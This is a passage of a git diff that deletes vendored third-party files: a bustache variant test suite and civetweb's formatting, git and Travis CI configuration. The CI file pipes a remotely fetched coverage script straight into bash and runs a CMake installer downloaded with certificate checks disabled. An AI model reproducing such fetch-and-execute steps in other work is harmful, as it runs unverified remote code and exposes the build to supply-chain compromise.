-        {"static", "static"}}))
-        ==
-        "<>");
-}
\ No newline at end of file
diff --git a/thirdparty/bustache/test/variant.cpp b/thirdparty/bustache/test/variant.cpp
deleted file mode 100644
index 9e04858..0000000
--- a/thirdparty/bustache/test/variant.cpp
+++ /dev/null
@@ -1,233 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016-2017 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#define CATCH_CONFIG_MAIN
-#include <catch.hpp>
-#include <bustache/detail/variant.hpp>
-
-struct BadCopyError {};
-
-struct BadCopy
-{
-    BadCopy() = default;
-
-    BadCopy(BadCopy&&) = default;
-
-    BadCopy(BadCopy const&)
-    {
-        throw BadCopyError();
-    }
-
-    BadCopy& operator=(BadCopy const&)
-    {
-        throw BadCopyError();
-    }
-
-    BadCopy& operator=(BadCopy&&) = default;
-};
-
-struct A
-{
-    A() = default;
-
-    A(A&& other) noexcept
-    {
-        other.moved = true;
-    }
-
-    A(A const&) = default;
-
-    A& operator=(A&& other) noexcept
-    {
-        assigned = true;
-        other.moved = true;
-        return *this;
-    }
-
-    A& operator=(A const& other) noexcept
-    {
-        assigned = true;
-        return *this;
-    }
-
-    bool assigned = false;
-    bool moved = false;
-};
-
-struct GoodInt
-{
-    operator int() const noexcept
-    {
-        return 0;
-    }
-};
-
-struct BadIntError {};
-
-struct BadInt
-{
-    operator int() const
-    {
-        throw BadIntError();
-    }
-};
-
-struct Visitor
-{
-    unsigned operator()(bool const&) const
-    {
-        return 0;
-    }
-
-    unsigned operator()(int const&) const
-    {
-        return 1;
-    }
-
-    unsigned operator()(A const&) const
-    {
-        return 2;
-    }
-
-    unsigned operator()(BadCopy const&) const
-    {
-        return 3;
-    }
-};
-
-namespace bustache
-{
-#define VAR(X, D)                                                               \
-    X(0, bool, D)                                                               \
-    X(1, int, D)                                                                \
-    X(2, A, D)                                                                  \
-    X(3, BadCopy, D)                                                            \
-/***/
-    class Var : public variant_base<Var>
-    {
-        VAR(Zz_BUSTACHE_VARIANT_MATCH,)
-    public:
-        Zz_BUSTACHE_VARIANT_DECL(Var, VAR, false)
-
-        Var() noexcept : _which(0), _0() {}
-    };
-#undef VAR
-}
-
-using namespace bustache;
-
-TEST_CASE("variant-ctor")
-{
-    {
-        Var v;
-        CHECK(v.valid());
-        CHECK(v.which() == 0);
-        Var v2(v);
-        CHECK(v.which() == 0);
-    }
-    {
-        Var v(true);
-        CHECK(v.valid());
-        CHECK(v.which() == 0);
-        Var v2(v);
-        CHECK(v.which() == 0);
-    }
-    {
-        Var v(0);
-        CHECK(v.valid());
-        CHECK(v.which() == 1);
-        Var v2(v);
-        CHECK(v.which() == 1);
-    }
-    {
-        Var v(A{});
-        CHECK(v.valid());
-        CHECK(v.which() == 2);
-        Var v2(v);
-        CHECK(v.which() == 2);
-    }
-    {
-        Var v(BadCopy{});
-        CHECK(v.valid());
-        CHECK(v.which() == 3);
-        CHECK_THROWS_AS(Var{v}, BadCopyError);
-    }
-    {   // Test convertible.
-        Var v(GoodInt{});
-        CHECK(v.valid());
-        CHECK(v.which() == 1);
-    }
-    {
-        Var v1(A{});
-        CHECK(v1.which() == 2);
-        Var v2(std::move(v1));
-        CHECK(v1.which() == 2);
-        CHECK(v2.which() == 2);
-        CHECK(get<A>(v1).moved == true);
-    }
-}
-
-TEST_CASE("variant-access")
-{
-    Var v;
-    CHECK(v.which() == 0);
-    CHECK(get<bool>(&v) != nullptr);
-    CHECK(get<bool>(v) == false);
-    CHECK(get<int>(&v) == nullptr);
-    CHECK_THROWS_AS(get<int>(v), bad_variant_access);
-    v = 1024;
-    CHECK(v.which() == 1);
-    CHECK(get<int>(&v) != nullptr);
-    CHECK(get<int>(v) == 1024);
-    get<int>(v) = true;
-    CHECK(v.which() == 1);
-    CHECK(get<int>(v) == 1);
-    v = true;
-    CHECK(v.which() == 0);
-    CHECK(get<bool>(v) == true);
-    CHECK_THROWS_AS(get<A>(v), bad_variant_access);
-    {
-        REQUIRE(v.which() != 2);
-        auto& a = v = A();
-        CHECK(v.which() == 2);
-        CHECK(get<A>(&v) != nullptr);
-        CHECK(get<A>(&v) == &a);
-        CHECK(!a.assigned);
-    }
-    {
-        REQUIRE(v.which() == 2);
-        auto& b = v = A();
-        CHECK(v.which() == 2);
-        CHECK(get<A>(&v) == &b);
-        CHECK(b.assigned);
-    }
-}
-
-TEST_CASE("variant-valuess-by-exception")
-{
-    Var v;
-    CHECK(v.valid());
-    CHECK_THROWS_AS(v = BadInt(), BadIntError);
-    CHECK(v.which() != 0);
-    CHECK(!v.valid());
-    v = 42;
-    CHECK(v.valid());
-
-    Var v2(BadCopy{});
-    CHECK_THROWS_AS(v = v2, BadCopyError);
-    CHECK(!v.valid());
-    CHECK(v2.which() == 3);
-}
-
-TEST_CASE("variant-visit")
-{
-    Visitor v;
-    CHECK(visit(v, Var{}) == 0);
-    CHECK(visit(v, Var{true}) == 0);
-    CHECK(visit(v, Var{0}) == 1);
-    CHECK(visit(v, Var{A{}}) == 2);
-    CHECK(visit(v, Var{BadCopy{}}) == 3);
-}
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/.clang-format b/thirdparty/civetweb-1.10/.clang-format
deleted file mode 100644
index 37a80d9..0000000
--- a/thirdparty/civetweb-1.10/.clang-format
+++ /dev/null
@@ -1,32 +0,0 @@
-# http://clang.llvm.org/docs/ClangFormatStyleOptions.html
-
-BasedOnStyle: LLVM
-
-IndentWidth: 4
-TabWidth: 4
-UseTab: ForIndentation
-ColumnLimit: 80
-
-Language: Cpp
-
-AlignAfterOpenBracket: true
-AllowAllParametersOfDeclarationOnNextLine: false
-AllowShortBlocksOnASingleLine: false
-AllowShortCaseLabelsOnASingleLine: false
-AllowShortFunctionsOnASingleLine: None
-AllowShortIfStatementsOnASingleLine: false
-AllowShortLoopsOnASingleLine: false
-AlwaysBreakAfterDefinitionReturnType: true
-BinPackArguments: false
-BinPackParameters: false
-BreakBeforeBinaryOperators: NonAssignment
-BreakBeforeBraces: Linux
-DerivePointerAlignment: false
-MaxEmptyLinesToKeep: 2
-PenaltyBreakBeforeFirstCallParameter: 100
-
-SpaceBeforeParens: ControlStatements
-SpaceInEmptyParentheses: false
-SpacesInSquareBrackets: false
-
-DisableFormat: false
diff --git a/thirdparty/civetweb-1.10/.gitattributes b/thirdparty/civetweb-1.10/.gitattributes
deleted file mode 100644
index 5c52867..0000000
--- a/thirdparty/civetweb-1.10/.gitattributes
+++ /dev/null
@@ -1,33 +0,0 @@
-# Auto detect text files and perform LF normalization
-* -text
-
-# Custom for Visual Studio
-*.cs     diff=csharp
-*.sln    merge=union
-*.csproj merge=union
-*.vbproj merge=union
-*.fsproj merge=union
-*.dbproj merge=union
-
-# Standard to msysgit
-*.doc    diff=astextplain
-*.DOC    diff=astextplain
-*.docx   diff=astextplain
-*.DOCX   diff=astextplain
-*.dot    diff=astextplain
-*.DOT    diff=astextplain
-*.pdf    diff=astextplain
-*.PDF    diff=astextplain
-*.rtf    diff=astextplain
-*.RTF    diff=astextplain
-
-# Preserver Windows specfic lines endings
-*.cmd text eol=crlf
-
-
-# Settings for github syntax highlighting
-# see https://github.com/github/linguist/blob/master/README.md
-docs/* linguist-documentation
-*.inl linguist-language=C
-*.h linguist-language=C
-include/CivetServer.h linguist-language=C++
diff --git a/thirdparty/civetweb-1.10/.gitignore b/thirdparty/civetweb-1.10/.gitignore
deleted file mode 100644
index f10aa01..0000000
--- a/thirdparty/civetweb-1.10/.gitignore
+++ /dev/null
@@ -1,268 +0,0 @@
-
-civetweb
-civetweb_test
-libcivetweb.a
-libcivetweb.so
-*-cache
-out
-*.dmg
-*.msi
-*.exe
-*.zip
-[oO]utput
-[tT]esting
-
-*.o
-
-#################
-## CMake
-#################
-/CMakeCache.txt
-/CMakeFiles
-/mingw-builds
-
-#################
-## Eclipse
-#################
-
-*.pydevproject
-.project
-.metadata
-bin/
-tmp/
-*.tmp
-*.bak
-*.swp
-*~.nib
-local.properties
-.classpath
-.settings/
-.loadpath
-
-# External tool builders
-.externalToolBuilders/
-
-# Locally stored "Eclipse launch configurations"
-*.launch
-
-# CDT-specific
-.cproject
-
-# PDT-specific
-.buildpath
-
-
-#################
-## Visual Studio
-#################
-
-## Ignore Visual Studio temporary files, build results, and
-## files generated by popular Visual Studio add-ons.
-
-# User-specific files
-*.suo
-*.user
-*.sln.docstates
-
-# Text-mode IDE tools
-cscope.out
-tags
-
-# Build results
-
-[Dd]ebug/
-[Dd]ebug CONSOLE/
-[Rr]elease/
-x64/
-[Bb]in/
-[Oo]bj/
-
-# MSTest test Results
-[Tt]est[Rr]esult*/
-[Bb]uild[Ll]og.*
-
-*_i.c
-*_p.c
-*.ilk
-*.meta
-*.obj
-*.pch
-*.pdb
-*.pgc
-*.pgd
-*.rsp
-*.sbr
-*.tlb
-*.tli
-*.tlh
-*.tmp
-*.tmp_proj
-*.log
-*.vspscc
-*.vssscc
-.builds
-*.pidb
-*.log
-*.scc
-
-# Visual C++ cache files
-ipch/
-*.aps
-*.ncb
-*.opensdf
-*.sdf
-*.cachefile
-*.VC.db
-*.VC.VC.opendb
-
-# Visual Studio profiler
-*.psess
-*.vsp
-*.vspx
-
-# Guidance Automation Toolkit
-*.gpState
-
-# ReSharper is a .NET coding add-in
-_ReSharper*/
-*.[Rr]e[Ss]harper
-
-# TeamCity is a build add-in
-_TeamCity*
-
-# DotCover is a Code Coverage Tool
-*.dotCover
-
-# NCrunch
-*.ncrunch*
-.*crunch*.local.xml
-
-# Installshield output folder
-[Ee]xpress/
-
-# DocProject is a documentation generator add-in
-DocProject/buildhelp/
-DocProject/Help/*.HxT
-DocProject/Help/*.HxC
-DocProject/Help/*.hhc
-DocProject/Help/*.hhk
-DocProject/Help/*.hhp
-DocProject/Help/Html2
-DocProject/Help/html
-
-# Click-Once directory
-publish/
-
-# Publish Web Output
-*.Publish.xml
-*.pubxml
-
-# NuGet Packages Directory
-## TODO: If you have NuGet Package Restore enabled, uncomment the next line
-#packages/
-
-# Windows Azure Build Output
-csx
-*.build.csdef
-
-# Windows Store app package directory
-AppPackages/
-
-# Others
-sql/
-*.Cache
-ClientBin/
-[Ss]tyle[Cc]op.*
-~$*
-*~
-*.dbmdl
-*.[Pp]ublish.xml
-*.pfx
-*.publishsettings
-
-# RIA/Silverlight projects
-Generated_Code/
-
-# Backup & report files from converting an old project file to a newer
-# Visual Studio version. Backup files are not needed, because we have git ;-)
-_UpgradeReport_Files/
-Backup*/
-UpgradeLog*.XML
-UpgradeLog*.htm
-
-# SQL Server files
-App_Data/*.mdf
-App_Data/*.ldf
-
-#############
-## Windows detritus
-#############
-
-# Windows image file caches
-Thumbs.db
-ehthumbs.db
-
-# Folder config file
-Desktop.ini
-
-# Recycle Bin used on file shares
-$RECYCLE.BIN/
-
-# Mac crap
-.DS_Store
-
-
-#############
-## Python
-#############
-
-*.py[co]
-
-# Packages
-*.egg
-*.egg-info
-dist/
-eggs/
-parts/
-var/
-sdist/
-develop-eggs/
-.installed.cfg
-
-# Installer logs
-pip-log.txt
-
-# Unit test / coverage reports
-.coverage
-.tox
-
-#Translations
-*.mo
-
-#Mr Developer
-.mr.developer.cfg
-
-
-##########################
-## Files created by tests
-##########################
-requests.db
-
-##########################
-## Files created by ctags
-##########################
-?tags
-?tags?
-
-##########################
-## Files created by autotools
-##########################
-*.lo
-.libs
-
-##########################
-## Travis Build Dir
-##########################
-ci/lua
-
-
diff --git a/thirdparty/civetweb-1.10/.travis.yml b/thirdparty/civetweb-1.10/.travis.yml
deleted file mode 100644
index 2dd926c..0000000
--- a/thirdparty/civetweb-1.10/.travis.yml
+++ /dev/null
@@ -1,694 +0,0 @@
-##############################################################################

-# Travis version specific build environment specification

-##############################################################################

-

-# The "precise" build environment on Travis is in the process of being decommissioned

-# see https://blog.travis-ci.com/2017-08-31-trusty-as-default-status

-# The "precise=true"+"sudo=required" environment seems to lack IPv6 support.

-# According to some tests, all "sudo=required" environments do not support IPv6, see 

-# https://github.com/travis-ci/travis-ci/issues/8361#issuecomment-328263113

-# The container environments for "sudo=false" support IPv6 localhost [::1] 

-# connections for server/client test. Thus, all tests with ENABLE_IPV6=YES

-#

-

-

-##############################################################################

-# Project specific settings

-##############################################################################

-

-language: c

-

-cache:

-  directories:

-  - $HOME/third-party

-

-osx_image: xcode8

-

-addons:

-  apt:

-    packages:

-      - cmake

-      - openssl

-      - libssl-dev

-    sources:

-      - kubuntu-backports

-

-

-before_install:

-  - if [ "${TRAVIS_OS_NAME}" == "linux" ]; then

-      mkdir $HOME/usr;

-      export PATH="$HOME/usr/bin:$PATH";

-      wget https://cmake.org/files/v3.7/cmake-3.7.2-Linux-x86_64.sh --no-check-certificate;

-      chmod +x cmake-3.7.2-Linux-x86_64.sh;

-      ./cmake-3.7.2-Linux-x86_64.sh --prefix=$HOME/usr --exclude-subdir --skip-license;

-    fi

-  - cmake --version

-

-

-install:

-  - if [ "${BUILD_TYPE}" == "Coverage" -a "${TRAVIS_OS_NAME}" == "linux" ]; then

-      PATH=~/.local/bin:${PATH};

-      pip install --user --upgrade pip;

-      pip install --user cpp-coveralls;

-    fi

-

-before_script:

-  # Check some settings of the build server (operating system, IPv6 availability, directory)

-  - uname -a

-  - ifconfig

-  - pwd

-  - ls -la

-  - if [ "${TRAVIS_OS_NAME}" == "linux" ]; then

-      apt-cache search gcc | grep "GNU C compiler";

-      apt-cache search clang | grep compiler;

-    fi

-  - if [[ "${BUILD_TYPE}" == "OSX_OPENSSL_1_1" ]]; then brew install openssl@1.1 ;fi

-  # Generate the build scripts with CMake

-  - mkdir output

-  - gcc test/cgi_test.c -o output/cgi_test.cgi

-  - cd output

-  - cmake --version

-  - cmake

-    -G "Unix Makefiles"

-    -DCMAKE_BUILD_TYPE=${BUILD_TYPE}

-    -DBUILD_SHARED_LIBS=${BUILD_SHARED}

-    "-DCIVETWEB_THIRD_PARTY_DIR=${HOME}/third-party"

-    -DCIVETWEB_ENABLE_THIRD_PARTY_OUTPUT=YES

-    -DCIVETWEB_ENABLE_SSL=${ENABLE_SSL}

-    -DCIVETWEB_DISABLE_CGI=${NO_CGI}

-    -DCIVETWEB_SERVE_NO_FILES=${NO_FILES}

-    -DCIVETWEB_ENABLE_SSL_DYNAMIC_LOADING=${ENABLE_SSL_DYNAMIC_LOADING}

-    -DCIVETWEB_SSL_OPENSSL_API_1_1=${OPENSSL_1_1}

-    -DCIVETWEB_ENABLE_WEBSOCKETS=${ENABLE_WEBSOCKETS}

-    -DCIVETWEB_ENABLE_CXX=${ENABLE_CXX}

-    -DCIVETWEB_ENABLE_IPV6=${ENABLE_IPV6}

-    -DCIVETWEB_ENABLE_SERVER_STATS=${ENABLE_SERVER_STATS}

-    -DCIVETWEB_ENABLE_LUA=${ENABLE_LUA}

-    -DCIVETWEB_ENABLE_LUA_SHARED=${ENABLE_LUA_SHARED}

-    -DCIVETWEB_ENABLE_DUKTAPE=${ENABLE_DUKTAPE}

-    -DCIVETWEB_DISABLE_CACHING=${NO_CACHING}

-    -DCIVETWEB_C_STANDARD=${C_STANDARD}

-    -DCIVETWEB_CXX_STANDARD=${CXX_STANDARD}

-    -DCIVETWEB_ALLOW_WARNINGS=${ALLOW_WARNINGS}

-    ${ADDITIONAL_CMAKE_ARGS}

-    ..

-  - ls -la

-

-script:

-  - if [ "${MACOSX_PACKAGE}" == "1" ]; then

-      cd "${TRAVIS_BUILD_DIR}";

-      make -f Makefile.osx package;

-    else

-      CTEST_OUTPUT_ON_FAILURE=1 make all test;

-    fi

-

-# Coveralls options: https://github.com/eddyxu/cpp-coveralls/blob/master/README.md

-after_success:

-  - if [ "${BUILD_TYPE}" == "Coverage" -a "${TRAVIS_OS_NAME}" == "linux" ]; then

-      coveralls --include src --exclude src/main.c --exclude src/third_party --include include --gcov-options '\-lp' --root .. --build-root .;

-      bash <(curl -s https://codecov.io/bash);

-    fi

-

-

-##############################################################################

-# build matrix (auto generated)

-##############################################################################

-

-

-matrix:

-  fast_finish: false

-  include:

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: clang

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-          - llvm-toolchain-precise-3.8

-        packages:

-          - clang-3.8

-    env:

-      idx=1

-      N=Clang3.8-Linux-Minimal-Debug

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-      BUILD_TYPE=Debug

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=0

-      BUILD_SHARED=NO

-      NO_FILES=YES

-      ENABLE_SSL=NO

-      NO_CGI=YES

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_SERVER_STATS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: clang

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-          - llvm-toolchain-precise-3.8

-        packages:

-          - clang-3.8

-    env:

-      idx=2

-      N=Clang3.8-Linux-Default-Release

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_SERVER_STATS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: clang

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-          - llvm-toolchain-precise-3.8

-        packages:

-          - clang-3.8

-    env:

-      idx=3

-      N=Clang3.8-Linux-Default-Release

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_SERVER_STATS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: clang

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-          - llvm-toolchain-precise-3.8

-        packages:

-          - clang-3.8

-    env:

-      idx=4

-      N=Clang3.8-Linux-Complete-NoLua-Release

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=YES

-      ALLOW_WARNINGS=YES

-

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: gcc

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-        packages:

-          - g++-5

-    env:

-      idx=5

-      N=GCC5-Linux-Complete-NoLua-Release

-      MATRIX_EVAL="CC=gcc-5 && CXX=g++-5"

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=YES

-      ALLOW_WARNINGS=YES

-  

-  - os: linux

-    compiler: gcc

-    env:

-      idx=6

-      N=GCCAnyVersion-Linux-Coverage

-      BUILD_TYPE=Coverage

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  - os: osx

-    compiler: clang

-    env:

-      idx=7

-      N=Clang-OSX-Complete-NoLua-Release

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=YES

-      ALLOW_WARNINGS=YES

-

-  -

-    os: osx

-    compiler: clang

-    env:

-      idx=8

-      N=Clang-OSX-Complete-NoLua-Release-OpenSSL_1_1_NoDynLoad

-      BUILD_TYPE=OSX_OPENSSL_1_1

-      ENABLE_SSL_DYNAMIC_LOADING=NO

-      OPENSSL_1_1=YES

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=YES

-      ALLOW_WARNINGS=YES

-      OPENSSL_ROOT_DIR="/usr/local/opt/openssl@1.1"

-      LDFLAGS="-L${OPENSSL_ROOT_DIR}/lib"

-      CFLAGS="-I${OPENSSL_ROOT_DIR}/include"

-      ADDITIONAL_CMAKE_ARGS="-DCMAKE_SHARED_LINKER_FLAGS=${LDFLAGS} -DCMAKE_C_FLAGS=${CFLAGS}"

-      PATH="${OPENSSL_ROOT_DIR}/bin:$PATH"

-      DYLD_LIBRARY_PATH="${OPENSSL_ROOT_DIR}/lib:${DYLD_LIBRARY_PATH}"

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: clang

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-          - llvm-toolchain-trusty-5.0

-        packages:

-          - clang-5.0

-    env:

-      idx=9

-      N=Clang50-Linux-Default-Shared

-      BUILD_TYPE=Debug

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=YES

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_SERVER_STATS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-

-  -

-    os: linux

-    dist: precise

-    sudo: required

-    compiler: clang

-    env:

-      idx=10

-      N=Precise-Clang-Linux-Default

-      BUILD_TYPE=Debug

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_SERVER_STATS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  -

-    os: osx

-    compiler: clang

-    env:

-      idx=11

-      N=OSX-Package

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-      MACOSX_PACKAGE=1

-

-  - dist: trusty

-    sudo: false

-    os: linux

-    compiler: clang

-    addons:

-      apt:

-        sources:

-          - ubuntu-toolchain-r-test

-          - llvm-toolchain-trusty-3.8

-        packages:

-          - clang-3.8

-    env:

-      idx=12

-      N=Clang-Linux-32bit-Complete-NoLua-Release

-      ARCH=x86

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_SERVER_STATS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=YES

-      ALLOW_WARNINGS=YES

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-

-

-### Test all build types:

-# According to CMakeLists, options are:

-# None Debug Release RelWithDebInfo MinSizeRel Coverage

-

-  -

-    os: linux

-    compiler: clang

-    env:

-      idx=13

-      N=NoSslDynamicLoading

-      BUILD_TYPE=Release

-      ENABLE_SSL_DYNAMIC_LOADING=NO

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      ENABLE_LUA_SHARED=NO

-      FEATURES=31

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=YES

-      ENABLE_WEBSOCKETS=YES

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-      MATRIX_EVAL="CC=clang-3.8 && CXX=clang++-3.8"

-

-  -

-    os: linux

-    compiler: gcc

-    env:

-      idx=14

-      N=GCCLinuxDefault_Debug

-      BUILD_TYPE=Debug

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  -

-    os: linux

-    compiler: gcc

-    env:

-      idx=15

-      N=GCCLinuxDefault_RelWithDebInfo

-      BUILD_TYPE=RelWithDebInfo

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  -

-    os: linux

-    compiler: gcc

-    env:

-      idx=16

-      N=GCCLinuxDefault_MinSizeRel

-      BUILD_TYPE=MinSizeRel

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

